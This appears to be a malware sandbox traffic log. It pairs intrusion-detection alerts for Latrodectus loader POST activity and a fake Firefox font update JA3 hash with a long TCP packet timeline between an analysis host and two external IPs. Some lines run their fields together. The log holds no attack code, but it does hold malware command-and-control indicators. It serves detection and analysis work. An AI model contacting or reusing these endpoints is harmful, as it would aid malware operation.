2024-11-13T11:02:09.570724+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58087 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:10.283737+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58088 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:12.418373+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58088 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:13.168299+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58089 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:15.758465+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58089 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:16.484077+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58090 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:19.491450+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58090 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:20.188077+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58091 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:22.228995+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58091 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:22.999986+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58092 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:24.993858+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58092 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:25.685711+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58093 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:27.739909+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58093 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:28.465289+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58094 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:30.572059+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58094 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:31.244083+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58095 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:33.251417+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58095 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:33.980071+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58096 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:35.921884+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58096 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:36.615479+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58097 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:38.445231+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58097 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:39.128499+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58098 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:41.675497+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58098 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:42.362240+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58100 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:44.403551+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58100 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:45.124335+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58101 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:47.142344+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58101 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:47.841462+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58102 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:49.821123+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58102 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:50.512085+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58103 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:52.623944+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58103 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:53.401221+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58104 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:55.224697+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58104 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:56.355343+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.8 | 58105 | 172.67.191.232 | 443 | TCP
2024-11-13T11:02:58.374492+0100 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.8 | 58105 | 172.67.191.232 | 443 | TCP
                                                                                                                                                          2024-11-13T11:02:59.151142+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858106172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:01.524516+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858106172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:02.236881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858107172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:04.592517+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858107172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:05.299439+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858108172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:07.619002+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858108172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:08.311583+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858109172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:11.207625+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858109172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:11.897932+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858110172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:14.603701+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858110172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:15.448359+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858111172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:17.830438+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858111172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:18.492050+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858112172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:20.528808+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858112172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:21.409415+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.858114172.67.191.232443TCP
                                                                                                                                                          2024-11-13T11:03:23.232250+01002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.858114172.67.191.232443TCP
                                                                                                                                                          Nov 13, 2024 11:00:33.411246061 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411256075 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411283970 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411325932 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411767960 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411818981 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.411984921 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.411993980 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412030935 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412034035 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412043095 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412065029 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412065029 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412091017 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412365913 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412379026 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412389040 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.412425041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.412425041 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.457911968 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.458036900 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.458040953 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.458141088 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.529881001 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530003071 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530010939 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530024052 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530077934 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530081034 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530081987 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530091047 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530102968 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530128956 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530165911 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530424118 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530478001 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530518055 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530565977 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530883074 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530930042 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.530976057 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.530986071 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531029940 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531029940 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531075954 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531105042 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531116962 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531127930 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531153917 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531155109 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531447887 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531497955 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531518936 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531562090 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531636000 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531653881 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.531687975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.531687975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.620917082 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.621016026 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.621143103 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.621283054 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649113894 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649180889 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649389029 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649400949 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649411917 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649422884 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649435043 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649447918 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649482965 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649770021 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649780989 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649791956 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:33.649826050 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:33.649858952 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277231932 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277280092 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277292013 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277323008 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277340889 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277350903 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277364016 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277400970 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277477980 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277478933 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277489901 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277502060 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.277532101 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.277559996 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.278182030 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.278239965 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.278409958 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.278409958 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396480083 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396538019 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396598101 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396631002 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396666050 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396699905 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396733999 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396766901 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396800995 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396828890 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396828890 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396830082 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396836042 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396863937 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396874905 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.396923065 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.396941900 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397067070 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397123098 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397131920 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397157907 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.397171974 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.397207975 CET580818877192.168.2.880.66.76.106
                                                                                                                                                          Nov 13, 2024 11:00:41.398142099 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.398180008 CET88775808180.66.76.106192.168.2.8
                                                                                                                                                          Nov 13, 2024 11:00:41.398209095 CET580818877192.168.2.880.66.76.106
Nov 13, 2024 11:00:41.398247957 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515333891 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515501976 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515522003 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515544891 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515582085 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515602112 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515616894 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515635014 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515650034 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515650034 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515650034 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515650034 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515674114 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515692949 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515696049 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515722036 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.515722990 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515749931 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.515768051 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.516164064 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.516199112 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.516228914 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.516232014 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.516249895 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.516252041 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.516279936 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.516289949 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.516379118 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634488106 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634541988 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634593964 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634593964 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634603024 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634639025 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634659052 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634675026 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634689093 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634730101 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634733915 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634768009 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634804964 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634810925 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634810925 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634843111 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634844065 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634874105 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634876966 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634910107 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634924889 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634943962 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634982109 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.634984016 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.634984016 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.635029078 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.635536909 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.635592937 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.635593891 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.635627985 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.635643959 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.635663986 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.635669947 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.635700941 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.753716946 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753773928 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753815889 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753849983 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753885984 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753909111 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.753920078 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753946066 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.753946066 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.753957033 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.753966093 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.753992081 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754000902 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754026890 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754034042 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754060984 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754069090 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754097939 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754102945 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754143953 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754219055 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754271984 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754275084 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754311085 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754323006 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754344940 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754368067 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754378080 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754379988 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754421949 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754795074 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754847050 CET  58081  8877   192.168.2.8     80.66.76.106
Nov 13, 2024 11:00:41.754851103 CET  8877   58081  80.66.76.106    192.168.2.8
Nov 13, 2024 11:00:41.754884958 CET  8877   58081  80.66.76.106    192.168.2.8
